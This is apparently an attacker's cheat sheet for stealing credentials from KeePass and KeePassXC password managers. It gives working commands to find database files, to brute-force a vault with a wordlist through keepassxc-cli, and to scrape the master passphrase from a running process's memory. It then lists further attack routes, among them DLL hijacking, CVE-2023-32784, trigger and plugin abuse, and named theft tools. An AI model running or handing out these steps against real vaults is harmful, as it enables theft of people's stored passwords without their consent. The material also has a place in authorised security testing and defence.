KeePass
Enumerate DB locations:
Cmd > type %APPDATA%\KeePass\KeePass.config.xml | findstr "<Path>"
Unlock with CLI:
$ for pw in `cat passwords.txt`; do echo "$pw" | keepassxc-cli ls db.kdbx [--key-file key.keyx] |& grep -v -e Enter -e Error -e If; done
KeePassXC
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion
Extract Passphrase from Memory
Using strings2:
PS > .\strings2.exe -pid (Get-Process KeePassXC) -a -wide > KeePassXC_strings.txt
PS > gc .\KeePassXC_strings.txt | Select-String -Pattern "Passw0"
PS > (gc .\KeePassXC_strings.txt).length
PS > (gc .\KeePassXC_strings.txt).length / 1mb
Using Get-ProcessStrings from PowerShellArsenal/MemoryTools:
DLL Hijacking
Extract Passphrase from Memory (< v2.53.1)
CVE-2023-32784
Abusing KeePass Triggers (< v2.54)
Tools
KeeFarce
KeeFarceReborn
Abusing the KeePass Plugin Cache
Export DB by compiling and loading a custom plugin (requires admin's privileges to place the .plgx file):
Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):
KeePassHax
KeeThief
CrackMapExec
KeePwn
ThievingFox